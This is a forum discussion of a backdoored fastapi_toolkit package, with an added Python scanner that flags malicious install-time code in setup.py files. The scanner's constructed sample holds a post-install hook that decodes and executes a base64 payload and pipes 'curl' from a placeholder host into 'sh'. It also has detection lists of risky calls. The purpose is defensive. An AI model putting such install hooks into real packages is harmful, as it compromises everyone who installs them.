by dlor 1299 days ago
The issue from the researchers appears to be here: https://github.com/timaakulich/fastapi_toolkit/issues/4

This is definitely pretty strange. Account takeovers happen, but just reverting the commit and closing the issue after one gets discovered is not the best way to handle these.

This is the reality of our modern software development process though. Your threat model now must include the GitHub account of every maintainer of every open source project you use.

4 comments

I’m the guy that opened that issue. To be clear, I’m NOT affiliated with datadog. I am co-founder of a software supply chain company https://phylum.io.

We scan all the open source packages as they’re published, and got a hit for this pretty much right away. The volume of packages that get published that are malware is astonishing…

Kind of unfortunate that these guys just closed the issue, if they aren’t malicious actors. I suspect that this is a fake account, and not an account compromise, though.
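The scanning described in the comment above (flagging a package as malicious as soon as it is published) is not shown on the page, so here is an added illustration of the kind of static heuristic such a scanner applies to a `setup.py`. This is example code written for this page, not Phylum's scanner and not anything from fastapi_toolkit; both sample `setup.py` sources below are constructed, and the 203.0.113.5 address is a documentation-range placeholder.

```python
import ast
import base64
import binascii
import re

# Constructed sample: an ordinary setup.py with nothing to flag.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="example", version="1.0", packages=["example"])
'''

# Constructed sample: the pattern seen in many backdoored PyPI uploads,
# a custom install command that decodes and executes a payload and
# fetches a second stage at `pip install` time.
SUSPICIOUS_SETUP = '''
import base64, os
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
        os.system("curl http://203.0.113.5/x | sh")

setup(name="example", version="1.0", cmdclass={"install": PostInstall})
'''

# Builtins that turn data into code, and library calls that execute
# commands, decode payloads or reach the network from install-time code.
RISKY_CALLS = {"exec", "eval", "compile", "__import__"}
RISKY_ATTRS = {
    ("base64", "b64decode"), ("os", "system"), ("os", "popen"),
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "call"),
    ("urllib.request", "urlopen"), ("requests", "get"), ("socket", "socket"),
}
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _dotted(node):
    """Return 'pkg.sub.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _decoded_base64(text):
    """Return the decoded text if `text` is a base64 literal of printable ASCII, else None."""
    if len(text) < 16 or not BASE64_RE.match(text):
        return None
    try:
        raw = base64.b64decode(text, validate=True)
        decoded = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def scan_setup_py(source):
    """Return sorted (lineno, finding) tuples for install-time code worth a human look."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, f"dynamic code execution via {name}()"))
            elif name and tuple(name.rsplit(".", 1)) in RISKY_ATTRS:
                findings.append((node.lineno, f"call to {name}()"))
            if name and name.split(".")[-1] == "setup":
                if any(kw.arg == "cmdclass" for kw in node.keywords):
                    findings.append((node.lineno, "setup() registers cmdclass"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                dotted = _dotted(base) or ""
                if dotted.split(".")[-1] in INSTALL_HOOK_BASES:
                    findings.append((node.lineno, f"custom install hook class {node.name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = _decoded_base64(node.value)
            if decoded is not None:
                findings.append((node.lineno, f"base64 literal decodes to {decoded!r}"))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, scan_setup_py(src))
```

Heuristics like these produce false positives (plenty of legitimate packages define `cmdclass`), so a hit is a trigger for human review or sandboxed execution of the install, not proof of malice; the combination of an install hook with decode-and-exec and a network fetch is what makes a sample worth the analyst's time.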

In order to be a bit more constructive, what is the ideal process for the author to remove it?

The issue in general of backdoored packages is not new, but its happening to you can be a new issue if you haven't thought of it before or simply not encountered it before. It would be very helpful if there was a resource out there answering the question "So your package was backdoored, what do you do now?" that people could refer to and get help.

Some kind of post-mortem or statement at all about how the GitHub account got compromised, if that's what happened here.

It could have also been a researcher checking to see if anyone would notice, or something worse.

I wouldn’t bet on an account takeover in this case.

> Your threat model now must include the GitHub account of every maintainer of every open source project you use.

But GitHub is afaik the only site on the Internet that actually does account management correctly, so at least there is that.